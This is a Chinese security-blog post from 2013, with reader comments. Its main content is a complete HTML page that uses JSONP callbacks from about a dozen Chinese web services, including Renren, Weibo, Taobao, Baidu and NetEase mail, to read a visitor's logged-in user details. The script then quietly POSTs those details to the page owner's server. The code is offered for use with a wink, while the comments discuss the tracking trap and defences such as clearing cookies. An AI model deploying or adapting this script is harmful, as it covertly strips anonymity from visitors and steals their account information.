追踪代码

<html>
<head>
<title>test</title>
</head>

<body>
<strong>It works</strong>
<script type="text/javascript">
var pid = 20130906003345;
var random = 60113;
function GetObjString(obj) {
	if (typeof(obj) != 'object') {
		return obj;
	}
	var retstr = '{ ';
	for (fld in obj) {
		retstr += '{ ' + fld + '=' + GetObjString(obj[fld]) + " }\n";
	}
	retstr += ' }';
	return retstr;
}
function ProcessDataInner(obj, subject) {
	var objstr = GetObjString(obj);
	objstr = escape(objstr);
	SendDataToServer(objstr, subject);
}
function createXHR() {
	// Checks whether support XMLHttpRequest or not.
	if (typeof XMLHttpRequest != "undefined") {
		return new XMLHttpRequest();
	}
	// IE6 and elder version.
	else if (typeof ActiveXObject != "undefined") {
		if (typeof arguments.callee.activeXString != "string") {
			var versions = ["MSXML2.XMLHttp6.0", "MSXML2.XMLHttp3.0", "MSXML2.XMLHttp"];
			for (var i = 0; i < versions.length; i++) {
				try {
					var xhr = new ActiveXObject(versions[i]);
					arguments.callee.activeXString = versions[i];
					return xhr;
				} catch(ex) {
					throw new Error(ex.toString());
				}
			}
			return new ActiveXObject(arguments.callee.activeXString);
		} else {
			throw new Error("No XHR object available");
		}
	}
	return null;
}
function SendDataToServer(Data, subject) {
	var req = createXHR();
	if (req != null) {
		req.onreadystatechange = function() {
			if (req.readyState == 4) {}
		};
		req.open("POST", "SaveInfo.php", true);
		req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
		req.send('data=' + Data + '&pid=' + pid + '&random=' + random + '&subject=' + subject, false);
	}
}
function GetDataFromServer(Url, Method, Data) {
	// Creates a XMLHttpRequest object.
	if (Method == null || Method == '') {
		Method = 'GET';
	}
	if (Url == null || Url == '') {
		return '';
	}
	var req = new createXHR();
	if (req != null) {
		req.open(Method, Url, false);
		if (Method == 'POST' || Data != null) {
			req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
		}
		req.send(Data);
		return req.responseText;
	}
	return '';
}
function renren(obj) {
	ProcessDataInner(obj, 1);
}
function jingdong(obj) {
	ProcessDataInner(obj, 2);
}
function tianya(bl, obj) {
	ProcessDataInner(obj, 3);
}
function weibo(obj) {
	ProcessDataInner(obj, 4);
}
function vancl(obj) {
	ProcessDataInner(obj, 6);
}
function netease_mail(obj) {
	ProcessDataInner(obj, 7);
}
function mop(obj) {
	ProcessDataInner(obj, 9);
}
function taobao_nick(obj) {
	ProcessDataInner(obj, 13);
}
function baidu(obj) {
	ProcessDataInner(obj, 14);
}
function renren_all(obj) {
	ProcessDataInner(obj, 15);
}
function jingdong_history(obj) {
	ProcessDataInner(obj, 16);
}
function baidu_all(obj) {
	ProcessDataInner(obj, 17);
}
</script>
<script src="http://base.yx.renren.com/RestAPI?method=api.base.getLoginUser&format=2&callback=renren"></script>
<script src="http://passport.360top.com/call/checkHello?callback=jingdong"></script>
<script src="http://passport.tianya.cn/online/checkuseronline.jsp?callback=tianya"></script>
<script src="http://weibo.com/ajaxlogin.php?fmelogin=1&callback=weibo"></script>
<script src="http://my.vancl.com/user/getusernamebycookie?vancl"></script>
<script>ProcessDataInner(getUserName,6);</script>
<script src="http://mailfriends.mail.163.com/mailfriends/webApi.do?json={"event":"logon"}&callback=netease_mail"></script>
<script src="http://passport.mop.com/common/user-info?callback=mop"></script>
<script src="http://tmm.taobao.com/member/birth_show.do?from=www.tmall.com&callback=taobao_nick"></script>
<script src="http://fm.baidu.com/dev/api/?tn=playlist&format=jsonp&id=1&callback=baidu"></script>
<script src="http://passport.game.renren.com/user/info?callback=renren_all"></script>
<script src="http://my.360buy.com/book/track.action?jsoncallback=jingdong_history"></script>
<script src="http://zhidao.baidu.com/api/loginInfo?callback=baidu_all"></script>
</body>
</html>

你懂的

@核攻击

[原文地址]

相关讨论:

1#

Ivan | 2013-09-08 12:36

搞個快照神馬的……

2#

Hackx7 | 2013-09-08 12:36

好牛逼的样子

3#

无敌L.t.H (:?门安天京北爱我) | 2013-09-08 12:47

拒绝第三方

4#

luom | 2013-09-08 12:49

这尼玛大陷阱啊

5#

Sogili (.) 长短短 () | 2013-09-08 13:29

ctrl+shift+n 打开隐身窗口

6#

liner (/\) | 2013-09-08 13:36

7#

猪猪侠 (A) | 2013-09-08 13:43

很好。

8#

xsser (十根阳具有长短!!) | 2013-09-08 14:24

撸主,百度甚至可以取得关键广告,知道你喜好的哈

9#

safe121 (--黑阔娱乐群:328034840) | 2013-09-08 14:30

@xsser 我在想,chrome的Block third-party cookies and site data是否有效。

感觉这个方法是 Cookie Stuffing

10#

一只猿 (恭喜你又中奖了!!) | 2013-09-08 14:38

@xsser 如何拒绝百度获取,有没有好的方法

11#

x7iao (宇宙黑阔。) | 2013-09-08 16:12

撸主 有接收端吗

12#

想要减肥的胖纸 | 2013-09-08 16:29

我又不做违法的事情。为什么会怕追踪呢。

13#

低调 | 2013-09-08 17:07

@xsser 一般网站联盟连男的女的 多大岁数 文化程度 都能分析出来 呵呵

核攻击 | 2013-09-12 10:49

WTF

相关内容:

注意,日站的时候请清理cookie或使用虚拟机,否则可被cookie追踪

猜想:利用GFW使中国对外网络瘫痪???

猜想_利用终端查询机日内网 免费购物 会员卡加钱???

如何保护自己之防非IP方式追查,黑钱提线,赃物收货。。。。

物理设备安全大牛 Barnaby Jack 挂了...

安全跑路指南2013之乌云版【连载中】

我们是如何通过一张照片定位到疯狗位置的

分享下自己使用的保护方法篇章二(虚拟机模板环境设置) 连载中...

分享下自己使用的保护方法篇章一(虚拟机代理中转服务器设置)连载中...

分享下自己使用的保护方法篇章一(虚拟机代理中转服务器设置) 连载中...

户外物理设备入侵之:入侵并“调教”中控指纹语音考勤系统(打卡机)

物理黑客户外硬件入侵之:某咖啡厅的广告展示终端……

公告:关于前两天本站无法打开的原因 + GFW拦截规则原理剖析

[讨论]如何入侵一个户外的电子显示屏

探索网络出口GFW的强度与翻墙

二维码应用漏洞|欺骗|....更多好玩的???

[fixed]中国移动139邮箱之前的一个重置密码流程漏洞

Inception能入侵全盘加密的计算机,修改物理机器内存/任意密码进入

android 延迟锁定bug,安卓手机锁破解,屏幕解锁保护

关于手机的隐私保护。。

远程入侵QQ好友所在网吧监控系统,人脸识别、定位坐标,定点打击

看新闻学知识之手机千里追回

西安丢iPhone定位在北京民警辗转2400公里追回

定位GFW的python脚本,如何找到GFW设备的IP地址

Android 无视屏幕解锁保护界面 - 安卓手机锁破解

找出 GFW 在 Internet 的位置、追踪 GFW 在互联网中的位置

网监如何爆菊?网警是如何通过层层VPN加密代理找到你的!

【需翻墙】网监如何爆菊?网警是如何通过层层VPN加密代理找到你的!

讲述一个关于高考的“黑客”故事:用2B铅笔“注入”阅卷系统

奇虎360成功加入GFW防火长城 为国家安全保驾护航

公布 GFW 防火墙旗下部分子服务器 IP

美国秘密研制新概念网路武器 可攻击离线电脑 无线电信号渗透

华裔黑客 BITcrash44 凭借一台 iPhone4 拿下时代广场大屏幕

视频:国外黑客无线入侵、遥控电子路桥系统

视频:国外黑客无线入侵保时捷911,并且远程操控、遥控

视频:国外黑客利用一部诺基亚N95手机入侵火车站电子屏,并且现场直播

视频:国外黑客入侵高速公路交通电子屏

大屏系统被黑 泰国国会现场直播不雅照

利用电磁波进行入侵、原子级的黑客入侵、利用电磁波毁坏物理设备

电视机会收到邻居游戏机画面?小霸王信号干扰?红白机功率这么强悍?

我国将建立IP地址黑名单制度 打击网络垃圾邮件

末世入侵行动 (Fire Sale!) 末日入侵行动

GSM蜂窝基站定位基本原理浅析

用黑客方式找回失窃的电脑 - GSM基站定位 - Wifi热点定位

不要偷黑客的东西 - Why you don't steal from a hacker

物理攻击、抓频攻击 - 利用雷达来进行扫描网络弱点

苹果iPhone和谷歌Android手机被曝"定位"用户

留言评论(旧系统):

佚名 @ 2013-10-10 10:11:18

如何反追踪?难道禁用cookie……?或者禁用javascript?似乎都不是好方法……

本站回复:

目测没啥好方法,只能随手删除cookie、设置浏览器退出的时候自动删除cookie……